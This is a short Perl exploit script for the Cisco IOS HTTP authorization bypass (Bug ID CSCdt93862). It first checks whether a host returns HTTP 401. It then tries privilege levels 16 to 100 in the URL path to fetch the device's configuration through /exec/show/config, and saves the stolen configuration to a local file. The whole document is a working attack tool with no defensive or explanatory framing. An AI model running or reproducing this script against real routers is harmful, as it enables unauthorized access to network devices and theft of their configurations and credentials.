#!/usr/bin/perl

#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#

use LWP;
use IO::Handle;

my $host = shift;

print "$host: ";
flush STDOUT;

my $agent = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

if ($response->is_success || $response->code != 401) {
	if ($response->header('Server') ne '') {
		print $response->header('Server');
		print "\n";
	}
	else {
		print "unexpected response, may not be a Cisco.\n";
	}
	exit;
}

for ($level = 16; $level <= 100; $level++) {
	$request->uri("http://$host/level/$level/exec/show/config");
	$response = $agent->request($request);
	if ($response->is_success) {
		open(HOST, ">$host") || die ("Can't open file $host\n");
		print HOST $response->content;
		close(HOST);
		print "exploited.\n";
		exit;
	}
	else {
		if ($response->code != 401) { 
			print "unexpected response, may not be a Cisco.\n";
			exit;
		}
	}
}

print "failed.\n";